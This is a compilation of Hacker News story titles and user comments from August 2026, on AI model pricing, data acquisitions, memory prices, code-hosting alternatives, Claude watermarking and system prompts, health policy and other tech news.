"I suspect that this kind of tactic is going to be everywhere in a year or so. Entire fake personalities and organization websites on the Internet created just to push a narrative or to advertise a product, which completely drown out real information.At some point they may be indistinguishable from human-produced work, so the only way to verify if a site is someone's genuine opinion or AI-generated narrative is through some form of authority (or something else that is very difficult for AI to fake, but that protection can be broken by advancing technology).If that happens, then in turn AI chatbot makers would in turn need to look for these kinds of authority to continue to provide accurate information, and said authority websites can use their privileged position to charge for access of their data."

"Itamar Ben-Gvir, just recently, stated that he wants to kill 30-40 Palestinians every night. He said so, publicly.So it is hilarious that Israel is trying to influence chatbots when shit like that is out in the open."

"Foundation for Defense of Democracies is another Israeli think tank that poses as an American organization. If you see anything quoted from them realize it's fake propaganda in the service of a foreign country."

Preview of 'GPT-5.6 Sol Pricing Cut by 50% on OpenRouter'

GPT-5.6 Sol Pricing Cut by 50% on OpenRouter

"The competition is real in pricing. Thanks for the Chinese open models, US big players have to cut their inference pricing. We've done a bunch of evals between the models, and Kimi K3 was the first one that actually could compete or be even better than Opus or Sol in our use cases, with a fraction of the price. All our developers use K3 as their programming model, and it now powers a big part of our systems instead of Opus and GPT. Surprisingly the new Sol pricing is quite similar to K3...Now DeepSeek v4 Flash 0731 is eating Gemini's lunch, and suddenly we saw a price cut (the "introductory price") for 3.7. DeepSeek is of same quality or sometimes better than Gemini for text, Google knows it and they have to compete. Too bad it's too little and too late, it's still 4-5x more expensive in our evals.And these models are not going away, nor their prices going up because of competition in the inference providers and due to the fact that you can buy/rent the hardware and run them in your own premises."

"After using Claude for a long time, I tested Sol 5.6 for the first time today. Love it, its an incredibly capable model and uses far fewer tokens/time thinking. Its what I imagine Fable would be if I haven't been downgraded on every conversation - even after completing the verification program. I think I may cancel my Claude subscription finally."

"Luna saw a huge jump after the price cut and is one of the more competitive models at the new price on openrouter.Maybe they want to see how much market they can grab with Sol?This might help but there are already cheaper models with Sol's intelligence more or less, the most notable being Grok 4.6 at $6/m which makes it a tougher sell"

Preview of 'Google has acquired the data of failed US airline Spirit'

Google has acquired the data of failed US airline Spirit

"About twenty years ago, I was taking a flight back from Rio de Janeiro, Brazil to the US. In the middle of the night the pilot got on the loudspeaker and said "hi! Having some engine trouble, so we are landing in Manaus."Manaus is in the middle of the Amazon.Needless to say, a bit scary to hear that, but we landed without issue.They told us we had two choices: the nice hotel with a shared room, or the lesser nice hotel with no roommate. I chose the latter. When we go there, they said, "oops, sorry, short on rooms!" So I had a roommate.Wandered around Manaus, took a skiff out on the Rio Negro. Saw pink river dolphins. A little boat approached us and a kid handed me a sloth, and then demanded I return it with a twenty dollar bill.The airline got us another plane 24 hours later. Made it back to the US safely.A few weeks later, the airline reached out and said "Here is $100 for your trouble."I declined to take that offer. I had missed several business meetings that cost me actual money. I couldn't donate blood for years because I had been to the Amazon and was tagged a malaria risk.During the many arguments with the airline I threatened to take them to small claims court.I got a really strange response over email which I clearly wasn't supposed to see. A representative from that airline was asking internally if they could put me on the no-fly list. That was really chilling.But, this is the kind of information I'm worried about when a vendor sells my data. If Google wanted to sell a product to the airlines that offered to keep annoying people like me from purchasing flights, they could do that with that email chain. I'm skeptical it'll be wiped correctly. Isn't my poor writing style basically my signature? How do you wipe that?"

"> Google bought itself 100 million emails and 500 million items from Microsoft Teams, 17 million OneDrive files and 20.5 million items from SharePoint. The search giant also now owns over 30 million recorded customer service calls, and more than 15 million customer service chat records. 600,000 ServiceNow tickets are another element of the collection, along with 13.7 million active emails addresses from Oracle’s Responsys marketing application, and details of 11 million sales of in-flight Wi-Fi services.> There’s also operational data in the trove, describing over 763,000 flights, five million crew pairings, more than 1.2 million fuel slips, and records describing purchases of 787,452 parts.> Google has reportedly said it bought the data to improve its AI services.Gives "this call is being recorded for training purposes" new meaning."

"> 600,000 ServiceNow tickets are another element of the collection, along with 13.7 million active emails addresses from Oracle’s Responsys marketing application, and details of 11 million sales of in-flight Wi-Fi services.I really doubt all this stuff was “de-identified”"

Preview of 'Memory prices climb 500% in 12 months'

Memory prices climb 500% in 12 months

"So the 1970s oil crisis caused a shift that included fuel efficiency rules. For like, the whole time I've been a software engineer, memory footprints of a lot of software have crept up, even when they aren't really doing more.The memory situation currently is a mess. But ... is it bad enough to get us to _change_ how we build?"

"The situation is absolutely awful for anybody who needs significant memory or storage (or devices incorporating such).Even people who think they have enough for the next few years already could end up with an unpleasant surprise if they e.g. have a stick or two of RAM go bad or a GPU fry. I have a few machines with aging sticks that I'm hoping will manage to hold out until when/if things improve."

"I wonder if supply chain constraints currently represent an inherent scepticism of manufacturers that demand will last. It feels to me like a side effect of the self-dealing / incestuous financing that is going on is that manufacturers are not willing to bet on it all materialising and therefore are not scaling up capacity nearly as much as they would if they thought it was certain."

Preview of 'Cursor launches Origin, GitHub alternative'

Cursor launches Origin, GitHub alternative

"Hi all, my name is Tomas. I am one of the developers on Origin, and I was one of the founders of Graphite (https://graphite.com).Happy to answer any questions about Origin or source control in general!"

"I really hope more people would use Tangled (https://tangled.org/)You get: - Self hosting your git hosting (if you want) - Self hosting your issues/PRs (if you want) - Self hosting your CI (if you want) - Github-like social features (I have one account, I can follow, star, add issues and PRs to any repo on tangled) It's built on ATProto, so even if the company disappears, all of the integration and features will still work for anyone that wants to run their own AppView (that is open-source), an AppView is basically the UI/Network-wide Data Aggregator for ATProto apps"

"I do wonder if calling this "Origin" is going to result in semantic misinterpretations by LLMs. Ie saying,> "hey can you push to origin main?"now has two separate meanings.A LLM may inadvertently push your code to a new provider without you knowing. It's walking a thin line between genius-growth-move and domain typosquatting."

Preview of 'Linux 7.3 improves performance when running out of vRAM'

Linux 7.3 improves performance when running out of vRAM

"This seems like an impressive improvement, and I'm looking forward to it eventually being upstreamed. Though unfortunately I'm on Nvidia right now, and have been struggling with vram. They don't seem to support any kind of paging at all.I am curious about the bit on virtual memory fragmentation. Would it make sense for the kernel to occasionally defragment that memory in place? I assume that would create a noticeable hitch, but might improve performance otherwise and allow for some applications to just fit in."

"I hope there will be an update where when my RAM gets full my PC doesn't freeze and becomes unusable... I remember that Linux and Windows do this in different ways and Windows doesn't have the problem."

"Great article. I find that I learn something every time I read a post about linux kernel work.I guess an LRU with priority would handle VRAM for games pretty decently without going getting too application specific.What about VRAM to Disk specifically NVME, would direct to disk be feasible for large workloads, I know it is used for streaming in assets directly via. PCIE, but i wonder how the performance would be on compute workloads running with NVME as a swap for GPU VRAM."

Preview of 'Beware Management Consultants'

Beware Management Consultants

"This is great: https://about.iceland.co.uk/our-story/the-dark-ages/the-chie..."

"I smirk and laugh this little slideshow and then remember that my own work involves internal tools to promote governance and productivity while formalizing requirements to two outsourced developers.I don't think I'm one of the red team's 7 captains, but I don't exactly have my hands on the paddle every single day. After all, I can find the time to lollygag on HN between 9-5."

"The intentional bad UX made me read the whole thing, instead of skimming through.In this day and age, bad UX is great for preventing ADHD users"

Preview of 'Quake Shareware, a CD-ROM just a little too full'

Quake Shareware, a CD-ROM just a little too full

""For video game developers, the CD-ROM was an odd beast. The capacity far exceeded the quantity of assets they were able to produce. A few titles, like 7th Guest (1993) or Phantasmagoria (1995) introduced Full Motion Video (in a world where only part of the screen could be animated). "------The title that made me go out and buy a CD-ROM drive was "Wing Commander III", released during the holidays of 1994, a year and a half before Quake 1. This was peak "Silliwood", when games started to use FMV cut-scenes starring bankable actors like Mark Hamill. Games were still being released for the SNES at this point, so imagine the contrast!In the age before wikipedia or ubiquitous internet access, it was also pretty amazing to have access to a multimedia enhanced encyclopedia. Storing large amounts of data was still a tricky thing. It would take a few years for CD-R's to arrive, and there would be a plethora of competing technologies like Zip drives. Looking back, it seems like computer technology was moving especially fast in the 90's."

"I did exactly this thing when I was a broke teenager. The files in my ID1 directory that I shuffle around from computer to computer to this day came from that disc 30 years ago. (I still have the disc, but not the case.) I did, however, purchase Quake II and III when they were released. And many years later bought Quake on Steam. I think they got their money's worth from me after all.(There were some who believed that making the shareware disc easily-crackable was an intentional stroke of genius. It got people who couldn't afford the full retail version to buy the game and expand its popularity. The argument being that $10 was a fairly ludicrous amount of money to pay for a single shareware game. Shareware CDs tended to be $5 on the high end, or free with most computer/gaming magazines.)"

"It’s worth getting the Quake shareware disc for the NIN soundtrack. Official track names are now available following the vinyl release a few years ago. This is the only CD release of the soundtrack. Just don’t forget to skip track 1."

Preview of 'Using the railway network as a flatbed scanner'

Using the railway network as a flatbed scanner

"Ward Cunningham and I did something similar back in 2008.We were both at a startup in Portland and our office was along the railroad tracks east of the Willamette. We were up on the 4th or 5th floor right above a lot of train traffic including Amtrak.I brought in some extra Mac gear I had including one of the early iSight cameras which back then was an external device you stuck on the top of your display and connected to the Mac via FireWire. We set it up and rolled the desk over to the window in the office and turned the camera around pointing down at the tracks and Ward got to work hacking something up to do a slit scan.It was a fun little project; the speed of the trains affected the horizontal compression of the images. We could tweak the software to expand or contract the size of the image by adjusting the number of slit scans per unit of time. Of course, that affected the exposure but I recall the camera having some automatic adjustments that gave us trouble.That's about all we did with it. Just a quick afternoon hacking project. Neither of us thought much about it at the time so we didn't save anything."

"I've posted this here before but I have been creating animations using a similar process with a regular camera and manually splicing the frames together. [1,2,3] The effect is quite interesting in how it forces focus on the subject reducing the background into an abstract pattern. Each 'line' is around 15px wide. I think I went through exactly the same thought process as the author, funny how ideas can come up independently like this.[1] https://youtube.com/shorts/VQuI1wW8hAw [2] https://youtube.com/shorts/vE6kLolf57w [3] https://youtube.com/shorts/QxvFyasQYAYI also shot a timelapse of the Tokyo skyline at sunset and applied a similar process [4], then motion tracked it so that time is traveling across the frame from left to right[5]. Each line here is 4 pixels wide and the original animation is in 8k.[4] https://youtu.be/wTma28gwSk0 [5] https://youtu.be/v5HLX5wFEGk"

"If you want to play around with slit scanning, I made this little toy a number of years ago and frequently find myself using it on trains:https://slitscan.spacePress and hold your phone screen to switch between the front/back cameras, or hit "c" on a computer. Tapping the screen saves the image, as does "s"."

18 August 2026
Preview of 'Anthropic's ‘watermark’ text adulteration in Claude is a perversion of writing'

Anthropic's ‘watermark’ text adulteration in Claude is a perversion of writing

"My biggest concern is that checking any text for watermarks requires sending the entire text to Anthropic. And even that is not sufficient, as the text might have been generated with ChatGPT, Gemini, Grok, Mistral, ...So every check requires sending the text to as many AI providers as offer a watermarking detection API, almost all of which have a very dubious track history with obtaining training data through illicit means.Any university using AI detection in their submission pipeline, or lawyers, editorialists, proofreaders that check for AI marks will be sending significant amounts of text like unpublished research, books, potentially internal documents and more, most of which is high quality human written, to dozens of AI companies, blindly trusting they won't train on any of that."

"> I want any LLM I use to choose the very best, most precise words at every single decision point.Then bad news: LLMs already use randomness in a fundamental way. Each time they go to generate a token, they first generate a probability distribution of possible tokens. Then they pick one randomly according to this distribution. The technique described can be thought of as making the random number generator pseudo random. The output it generates is one of the possible outputs it would have generated before, just now it's deterministic and will generate the same thing every time."

"> "The exact words we choose when writing matter."Then write your own damn text if you care about the exact wording so much"

Preview of 'Qwen 3.8 27B is excellent, but it defaults to overthinking things'

Qwen 3.8 27B is excellent, but it defaults to overthinking things

"“The fact that a 17GB file can do all of this stuff on my home machines is a miracle. Once again, I’m delighted and amazed at how much progress local models have made this year.”I think that should be the blinking headline - this shows what can be done with consumer hardware."

"All current era models overthink as it's a product of their RL incentives (or distillation of models with them...)From my reading of the Fable 5 and Opus 5 System cards, my reconstruction is something like:Finish the task → make externally observable evidence that it is finished → check your own work → fix problems → don't stop prematurely → satisfy the evaluator comprehensively.That is fantastic for SWE benchmarks and autonomous agents. It also naturally creates pathologies:under-answering is expensive; over-answering is cheap."

"I forked llama.cpp and added some crude mechanism to keep exactly this behavior under control - essentially guiding the reasoning process by injecting text strategically at specific thresholds. This was mainly put together to rein in Qwen3.6-27B, but I'd imagine 3.8 would react similarly.Fork can be found here - https://github.com/laurencehardman/llama-mindcontrol/tree/ma...Of course hacks like this are not perfect and may degrade performance slightly due to injected text pushing the model slightly out-of-distribution, so the string constants need to be chosen carefully - Qwen3.5's technical whitepaper does provide some guidance in this regard. The mechanism is absolutely more of a hack than a feature, and i'd imagine will be made redundant once llama.cpp supports more appropriate reasoning controls - but for now, i've found it pretty useful."

Preview of 'AI;DR (AI; Didn't Read)'

AI;DR (AI; Didn't Read)

"My coworkers continue to dump hundreds of lines of AI documentation in every PR and every other line of code has between one and ten lines of AI generated comments, talking about the real unlock and how things are byte for byte identical on the load bearing path or how the acceptance ladder is misleading.Features are coming out and metrics are improving, but we’re basically in a post readability code base, with the occasional performative comment about a variable name.I don’t really know how to address this situation or if it needs addressed. I certainly don’t read the long-winded AI comments or the AI documentation, but perhaps it’s useful for the AI on its next pass."

"I think the main reason many people (including me), very often, lack the motivation to read content that is likely generated by AI is the suspicion that it comes from a place of intellectual laziness. Another reason, based on personal experience, is that AI content may suffer from too much verbosity, too much jargon and over-confidence, which makes the reading experience feel fake and border-line irritating. In many cases the content may have very little to no nuance, which is ultimately a waste of time. As an anecdote, someone posted a blogpost on Linkedin on using agents to implement a driver to access PCIe devices over TCP/IP. I was intrigued because that's not an easy task for several reasons, like handling PCIe interrupts and DMA. For exmaple, how does the remote machine map the device's PCIe BARs? And when it issues I/O to the devices registers, how are these reads and writes transferred to the remote device. In the end, this is just some virtual memory. In a local machine, this is either directly mapped to the PCIe physical addresses or some IOMMU virtual address space which is then translated by the hardware upon CPU/device/VM access.After reading the long verbose promising article, in the end, the guy (with the help of the agent) only managed to implement access to the PCIe config space so that lspci on the remote machine works and shows the remote PCIe device, but that's all. It never addressed the issues above nor even mentioned them. The code was AI generated. The article was AI-written. The article never made a reference to DMA, interrupts, MSIX-X, IOMMU, IOTLB, virtual memory, etc, but it made big claims on next-gen datacenter disaggregated architecture, boosting GPU utilization, reducing large scale inference costs, etc.Anyway, you get my point: big long beautiful words, but zero nuance."

"The part that astonishes me is that in the year of our common era two thousand twenty-six that it's not universally offensive and reviling to post an AI-generated response to another person.If I'm reading something on the internet, I'm either reading it to learn, or I'm reading it to be persuaded. If I wanted the LLM to teach me (thank you, no), I would ask an LLM. I'm reading your website/newsletter/email because I want to hear from you.. If you can't be bothered to put your time into writing it and teaching me what you think, why should I be bothered to read it?"

Preview of 'Incident with Github.com'

Incident with Github.com

"[dupe] https://news.ycombinator.com/item?id=49330597"

Preview of 'A Preview of DuckDB v2.0'

A Preview of DuckDB v2.0

"Super excited about Quack (partially due to the name). I use duckdb for both analytics and runtime, but I do have to serve/handle/manage a giant, multi-GiB duckdb file as effectively a runtime artifact[1]. I'm aware that this isn't the _perfect_ database for this, but the mix of it being fast, having spatial support, sane coding interfaces, great dbt integration, and me being able to do everything between "run a giant several hundred step dbt pipeline" to "query the output of said pipeline" to "read/query a csv on disk" with the exact same tool is just so nice. If I could centrally manage said asset more akin to a traditional database, I'd be very happy.I've partially solved this with separate databases for different steps in the data pipeline(s) and have even experimented with Clickhouse as a complete alternative, but I really like way too many things about duckdb to replace it.[1]: If you care: https://skaldmaps.com/blog/2026/07/zip-codes-are-a-bad-spati..."

"DuckDB is one of the things I've been most excited about in a long time. Introduced it to projects at 3 companies since 2023, greatly lowering resource requirements and running it in a variety of environments. Just having the ability to do out of core bigger than memory data processing on lower end consumer grade hardware is remarkable.Thanks to the team for everything!"

"I <3 DuckDB. It has become one of my go to tools for storing, data processing , integrations and now even graph. More importantly it's fun to use because it is so portable. Looking forward to v2."

Preview of 'Ask HN: Alternatives to GitHub'

Ask HN: Alternatives to GitHub

"To all of those proposing self-hosted GitLab: we did it for 6+ years in my company, and it's not always a smooth sailing. We had our own runners and we made it auto-upgrade across docker images daily before business start. It mostly worked really well, except those few times were a Docker upgrade had to be rolled back, or that one time the bundled pg_shared_buffers was set at 1MB by default, making schema upgrades impossible for bigger instances, or a version major would break pipeline expectations forcing to upgrade 200+ repos at a time (we pinned to major afterwards). Lately I was also receiving an almost weekly "critical patch" newsletter due to critical/high vulnerabilities, which I can only imagine are due to LLM running over the code and identifying bugs.That said, I wish we hadn't migrated to GH, our self-hosted instance had WAY less downtime despite being perhaps a bit slower (mgmt saving money) and required a bit more toil: GH is nowhere near Enterprise-ready and it feels a downgrade across the board. GL has better access granularity, better docs, better integrations, and you can clearly see the UI received a lot of attention (although it does take 10m with a new account to pin the proper items in the maze of sub-menus that is the sidebar). You can also look at the code and help out if needed, and/or simply provide a patched version to your image via a docker mount.If you're really looking at self-hosting GitLab for a smallish team (up to 50-100 ppl), prepare at the very least a 16GB machine (best 32GB) with 4 cores and a decent SSD, and at least a small team (1-3 people) that can maintain it properly or jump at it at any moment. For runners, a small k3s cluster is ideal to make use of all the resources you can throw at it without worrying about managing the runner state/configuration."

"It depends on what you are after?1. Do you want something that works and feels like GitHub? -- Forgejo and Gitea are good for this.2. Do you want a place to host git repositories with minimal hassle? -- GitLab, CodeBerg, and others are available.3. Do you have your own hosting infrastructure? You could use gitolite and CGit/GitWeb on that hosting platform or local hardware.4. Do you just want to host repositories? -- Gitolite can be used to help with SSH/auth/repository creation, and CGit or GitWeb for the frontend.5. Do you need something like GitHub Actions? -- GitLab, Forgejo, and Gitea offer CI, or use external CI infrastructure.6. Do you need issue tracking and management? -- GitLab, Forgejo, and Gitea provide these. There are alternatives from Jira to Kanban (including Trello) to Markdown (Obsidian and others) and more."

"https://tangled.org! Founder/CEO here. We're a new forge building things from the ground up, and are fully federated -- you can host your git repos on your own infra, along with the CI runners. We've also got a pretty neat set of features (if I may say so myself): stacked PRs, Nix-based CI (if you want it), and a fully open protocol (https://atproto.com) to for you and your agents.Happy to answer any questions."

Preview of 'Incident with Github.com [resolved]'

Incident with Github.com [resolved]

"I don't understand why Github hasn't solved this problem with pricing updates. My understanding is they are getting hammered with LLM generated code growing their traffic by over an order of magnitude. So why not rate limit non-paying users and charge for whatever scarce resource is being consumed that is causing them to constantly fall-over? This seems like a basic economics problem."

"I had a lot of goodwill for GitHub but I think today is the tipping point.Looking at a unicorn page, I feel this lingering hope that it's transient (like it usually was in the old days) but my mind reassures me it's probably going to be a long full outage again.The hope is dead."

"I recall reading years ago that cloud services were expected to run with a reliability of 3 or 4 '9's and that if they didn't competing services would quickly overtake them in adoption. The industry was supposed to be that cut throat.Has big tech reached a similar status like banks in that they are "too big to fail" i.e. when they do fail we all just look the other way and say: "well everyone else is out too". Didn't someone recently calculate that GitHub is running at 95%? For comparison the Irish Rail service which is not reliable has 80% of it's trains run on time.This seems absurd and really challenges a lot of ideas I had about big tech and cloud infrastructure. GitHub seems to have remained the dominant player relative to GitLab etc."

Preview of 'Stripe will reportedly acquire OpenRouter for $7B+'

Stripe will reportedly acquire OpenRouter for $7B+

"To people asking why, this is a good lesson on the Collison’s ambitions. Stripe is one of the best API companies in the world. They know how to serve high volumes of latency and availability sensitive requests. They’ve abstracted the financial rails for payments and now want to abstract the rails for LLMs.They’re the perfect company to own OpenRouter.Tokens are simply a lightweight valuable asset. Stripe can serve as the middleman as well as anyone. They know how to route to many providers (payment rails) with huge differences in service characteristics. LLM providers are far easier.Then they can work this into an offering where users can subscribe to tokens and use them across services. It solves one of the core monetization challenges of every AI company: how do you price when your costs are variable on usage, but nobody can make sense of charging by token?From here, they can start hosting their own models and competing as an AWS for tokens. They can be the best provider of $OPEN_MODEL, or their own, and optimize for you."

"I wonder if this deal is primarily just to buy payment volume.OpenAI just announced earlier this week that Ayden would become their payment provider (when it was previously Stripe).And OpenRouter has a large percentage of overall AI payment volume for all the major labs.Both OpenAI and OpenRouter represent ~$100B in payment volume, whereas Stripe in total doing ~$2T. Two customer doing ~5% of your total volume who didn’t even exist a few years ago, must be kind of scary for Stripe.https://www.reuters.com/business/retail-consumer/rise-ai-sho...https://stripe.com/newsroom/news/stripe-2025-update"

"How can a middle man for api calls be worth so much? Their market share can’t be very large right? For comparison, $7B is more than market cap of Lyft, Dolby, and Alaska Airlines. What is happening?https://stockanalysis.com/list/mid-cap-stocks/"

Preview of 'Universal health coverage could save $1T and 114k lives a year: study'

Universal health coverage could save $1T and 114k lives a year: study

"I'd like to believe this, but the study makes a bunch of really hasty assumptions.The authors derive the $1T number from $1.3T in total cost savings and $304B in incremental spend (incremental spend is due to insuring more people). The $1.3T in cost savings come from five big buckets: lower pharmaceutical prices, Medicare-level payments to providers, reduced administrative overhead, less fraudulent billing, and fewer avoidable emergency department visits and hospitalizations.The buckets themselves don't necessarily survive much scrutiny.Take "Medicare-level payments to providers". Hospitals have an operating margin of 2-5%. Medicare pays 50% less than private insurance. So doing this would require either layoffs, cutting salaries for doctors/nurses/etc, or both. This may well be the right decision for society as a whole--that's a big part of the debate here--but there's no free lunch.The line item of "fewer avoidable emergency department visits and hospitalizations" assumes greater insurance coverage leads to greater access to primary care. It's true that great primary care prevents hospitalizations, and can be a net cost saving under certain assumptions [1]. But, we're actually in a primary care shortage. Existing insurance payments for primary care are low enough that private practices are going out of business and fewer residents are going into family medicine. Cutting rates (the paragraph above) would make this worse.For "less fraudulent billing," a lot of people in the industry believe that Medicare has a large amount of undetected fraud. That's unfortunately the flip-side of reduced administrative overhead. The authors assume an 8% savings here, but the 2003 paper they cite uses the word "fraud" only twice and doesn't give a number.Healthcare reform is hard.[1] Reasonable breakdown on the economics of advanced primary care models: https://olearykm.medium.com/the-cost-equation-for-new-primar..."

"There are a lot of people making a lot of money on the inefficiencies of the US system. They won’t give up their revenue streams without a fight, and they are filthy rich on the backs of sick people. You better believe they will play dirty."

"Switzerland has the system closest to the US in my experience, but with universal coverage.As individual, you buy basic insurance costing roughly $500/month with a $2500 yearly deductible (LAMal/KVG). Applicants must be accepted even with pre-existing conditions. Post-deductible, you pay 10% co-insurance capped at roughly $800/year (no medical bankruptcy). Insurers operate basic plans as non-profit. They make their profit on optional supplemental insurance (private hospital rooms, extra benefits...) The state subsidizes basic premiums for low-income individuals. A doctor's visit is a $150 minimum, similar to the US.What was most surprising compared to here in the US is employers pay $0 toward premiums. Funding is entirely decoupled from employment. You don't lose coverage or change plans when changing jobs.On the negative, basic insurance does not have dental, so dental stuff is out-of-pocket and expensive.In terms of stats, the US spends 18% of GDP on healthcare vs. 12% for Switzerland and the gain is lower stress too. Not perfect but maybe the best of both worlds."

Preview of 'How Bluesky draws its logo on screenshots'

How Bluesky draws its logo on screenshots

"If it's between this and a perpetual logo, I'll take this any day.I actually really like this approach. The action button isn't relevant in this context, and it doesn't occlude the content.There's certainly situations where you wouldn't want this (ie if you're developing the app and you want to redesign starting from a screenshot), but for the average user I think this isn't overly hostile. I understand that people are dogmatically opposed to intent being modified, but I think you need to balance nuance. I actually enjoy having an attributable source in shared elements, and I think this is a low-impact way of achieving that."

"This is phone OS developer's fault for even allowing it. When I take a screenshot, I expect to have an image of exactly whatever was displayed on the screen at the time. Its not a picture of your app, its a picture of my screen. Some banking apps used to (or still) prevent this and now some apps get a hook to insert their branding. My device serves some master other than myself."

"This is in fact a watermark to promote the application, which otherwise wouldn't be recognizable since Bluesky looks like every other microblogging app. I didn't know that Sam literally named the file GrowthHack.tsx, which is pretty funny."

17 August 2026
Preview of 'Claude: System Prompts'

Claude: System Prompts

"I have a folder where I rebuild these as a git commit history so you can more easily see what has changed: https://github.com/simonw/research/commits/main/extract-syst...For example here's what changed between Opus 4.8 and Opus 5: https://github.com/simonw/research/commit/a2de185cc367eb66c2...The most interesting addition to the prompt from that diff is this bit:> Claude Fable 5 and Claude Mythos 5 were first released on June 9, 2026. On June 12, 2026, Anthropic suspended access to both models to comply with U.S. Department of Commerce export controls; the Department lifted those controls on June 30, 2026, and Anthropic restored access on July 1, 2026 (Anthropic's statement: [https://www.anthropic.com/news/fable-mythos-access](https://www.anthropic.com/news/fable-mythos-access)). These events are after Claude's training-data cutoff, so Claude knows about them only from this notice. If asked, Claude confirms them accurately and matter-of-factly — it doesn't deny the suspension happened — and otherwise treats the export controls like any other current political topic: it gives a fair, accurate account rather than sharing personal opinions, and points to the linked statement for anything further. Things may have developed since this notice, so Claude checks for newer information when it can search, and otherwise suggests checking Anthropic's site.One frustrating note about this page is that they share the system prompts used for https://claude.ai and the Claude mobile apps regular chat, but they omit the tool definitions. Those are much more interesting if you want to understand what Claude can actually do for you. You can reconstruct them through prompting Claude directly but that's extra friction and risks refusals and hallucinations.They also don't publish the Claude Code system prompts, which is silly because those are trivial to extract using a logging proxy."

"Offtopic. I have a concern that this forum is removing stories that have negative connotation on AI.Few days back, I posted an article[1] that was about how AI threatens natural resources for billions. This was from United Nations and it was flagged. I did not think much about it until I saw two other stories [2] & [3] today that were doing fairly good on front page but they suddenly disappeared. They are not even on 2nd or 3rd page. I have seen this happening at other times as well but did not document it. Just thought you all should know about this.I was going to create Tell HN thread but I thought the same would happen with it too. I am pretty sure this thread is not going anywhere so I'm posting my concern here.[1]: https://news.ycombinator.com/item?id=49290062[2]: https://news.ycombinator.com/item?id=49318906[3]: https://news.ycombinator.com/item?id=49319582"

"> A prompt implying an image is present doesn't mean one is (the person may have forgotten to upload it), so Claude checks for itself.Interesting that enforcing this via system prompt for such a powerful model like Opus 4.8 doesn’t feel like the Anthropic themselves treat it as something with ‘intelligence’. This is basically just very generic common sense to meFunnily, a similar prompt is present even for Fable 5, while I remember there was a blog post, maybe even from A., and they were saying something like “hey, the new models are so smart, don’t overload them with extra plugin/context”. Well, they clearly aren’t. Don’t want to sound like an AI-skeptic, I use it daily, just stating the fact.> Claude keeps responses focused, brief, and concise to avoid overwhelming the personThis is also very interesting. It pretty much ignores it by default. The responses, PR descriptions, and code comments are so verbose with new A. models, so it always requires extra prompting from me or putting comment into skill/plugin/claude.md to make them of a reasonable length"

Preview of 'Firefox for iOS now has a native adblocker'

Firefox for iOS now has a native adblocker

"In case anyone here missed it, there's a native Ublock Origin for Safari. It works great → https://apps.apple.com/us/app/ublock-origin-lite/id674534269..."

"Unfortunately, Firefox on iOS still can't automatically clear cookies and cache for all websites except those specifically excluded. Which obviously is a big privacy issue in regards to being tracked.Brave on iOS for example implemented this 2 years ago:"Auto Shred lets you automatically delete data for specific sites [...] You can configure Auto Shred to happen when all tabs for a site are closed, or on browser restart. Auto Shredding on Site Tabs Closed means that whenever you close the last tab for a site, Brave will automatically Shred that site’s data."https://brave.com/privacy-updates/30-shred-button/#:~:text=A..."

"Technically, Firefox Focus (a separate browser for iOS) includes an adblocker feature that can be applied system wide via iOS's content blockers subsystem. This was released in the late 2010s.Firefox including it is likely just reducing the steps required."

Preview of 'A third world engineer responds to “RISC-V: They should have known better”'

A third world engineer responds to “RISC-V: They should have known better”

"I think he's kind of speaking past the original author. The original piece is basically about how the author doesn't think that RISC-V will take off outside embedded, because of some design decisions that lead to poor performance compared to ARM64 and because so much of the ISA being optional means that there's too much fragmentation to make binary distribution feasible. Meanwhile, this piece is mainly about how RISC-V is great for embedded because companies can build it into custom chips with specifically the functionality they need, and because of how cheap it is for low-end use cases since there's no license fees.The only real point of contention I see between the two is that this piece goes on to talk about how it's a selling point that RISC-V can be used for both low-end 10 cent microcontrollers, and high-end multi-core processors running Linux. Personally I don't see the benefit of this since you're going to have to recompile your software anyway, and since all the RISC-V SBCs I'm aware of have significantly worse performance and efficiency than comparably priced ARM SBCs."

"I don't really understand the author's conclusions about cost and shipping, and how RISC-V is cheaper and more accessible to people outside the US and Europe. He first talks about how getting $1 worth of chips can cost $60-$200 in shipping for him due to his location... but then by the end claims that RISC-V gives him "an architecture that arrives in my country at ten cents a part".I don't get how both things can be true. The cost to ship something to Trinidad and Tobago has nothing to do with whether it's ARM or RISC-V; shipping the same weight of either kind of chips should cost exactly the same amount. Yes, maybe the chip cost itself of a particular ARM-based model is $0.15 while the equivalent RISC-V chip costs $0.10, but if the issue (for him and other people who live outside US/Europe) is that shipping costs are orders of magnitude more expensive than the thing being shipped, that chip-cost difference becomes irrelevant.I think he does make a great point about how fragmentation does give you better optionality: ARM is sort of like cable TV where you have a small number of product categories that each bundle a particular set of features, whereas with RISC-V you design something bespoke that does exactly what you need and nothing more. But again, this isn't going to affect shipping costs."

"He says:> From that position, the difference between a ten cent part and a one dollar part is not a rounding error and it is not a detail you get to wave past on the way to the interesting discussion about encodingsYet earlier:> I pay anywhere from US $60 to US $200 to ship one dollar chips that people everywhere else get free shipping onSeems to me that the difference between a 10c chip and a $1 chip are a rounding error when the shipping cost dominates so much?"

Preview of 'Super El Niño Keeps Growing as New Forecasts Reach Record Territory Ahead Winter'

Super El Niño Keeps Growing as New Forecasts Reach Record Territory Ahead Winter

"The strongest El Niño ever caused a massive famine:https://en.wikipedia.org/wiki/1877%E2%80%931878_El_Ni%C3%B1o..."

"Remember that this is just a piece of the complex system that is the global climate. And over it, there are more systems affected, including human ones like food production or economy. Something this extreme may cause from a severe disruption or a permanent instability in those systems, specially considering feedback loops in all of them."

"People really don’t appreciate yet. How really bad this situation is and will be. They’re talking about 1.76°C higher temperatures next year because of this El Niño. Those are climate change temperatures that are not supposed to be around until 2035. So it’ll give us a sneak peek into our future.But the biggest effect and this is noted by many insurance companies now is going to be in places like India.But this is something the world has never seen and I mean that literally so I don’t expect it to be anything but really bad and you should be ready."

Preview of 'Tell HN: Cloudflare silently injects its analytics when you switch nameservers'

Tell HN: Cloudflare silently injects its analytics when you switch nameservers

"You are right that Cloudflare enabled these analytics by default for our free plans in Septemeber of last year.We built Real User Measurement (RUM) into our free plans because it gives site owners actionable performance data they would not otherwise have. It is on by default for free sites fr the reasons we wrote about in the blog post below. It is easy to disable if you don't want it on. All of our paid plans are opt-in only.This also gives free plans access to our Observatory product at no cost. Observatory is a performance-monitoring tool inside the Cloudflare dashboard that combines real user data with simulated lab tests to help you measure and improve your website speed.Blog post: https://blog.cloudflare.com/the-rum-diaries-enabling-web-ana..."

